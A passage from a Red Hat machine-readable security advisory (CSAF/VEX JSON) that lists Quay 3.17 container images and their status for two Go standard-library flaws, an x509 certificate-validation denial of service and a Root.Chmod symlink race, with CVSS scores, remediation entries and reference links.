            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456333"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go\u0027s `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw occurs during the validation of otherwise trusted certificate chains that contain a large number of policy mappings, leading to excessive resource consumption. Exploitation requires an attacker to present a specially crafted, yet trusted, certificate chain which would require the attacker has already compromised a trusted certificate root. Red Hat continuously monitors certificate authorities and curates the set which is trusted by default for Red Hat products.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456333",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32281",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758061",
          "url": "https://go.dev/cl/758061"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78281",
          "url": "https://go.dev/issue/78281"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4946",
          "url": "https://pkg.go.dev/vuln/GO-2026-4946"
        }
      ],
      "release_date": "2026-04-08T01:06:58.354000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation"
    },
    {
      "cve": "CVE-2026-32282",
      "cwe": {
        "id": "CWE-367",
        "name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
      },
      "discovery_date": "2026-04-08T02:01:12.683211+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456336"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs access to the system and the required permissions to create a symbolic link. Additionally, the attacker must swap the target file with a symbolic link in the exact window after the `Root.Chmod` function checks its target but before acting. Due to these conditions, this flaw has been rated with a moderate severity.",
          "title": "Statement"
        },
        {
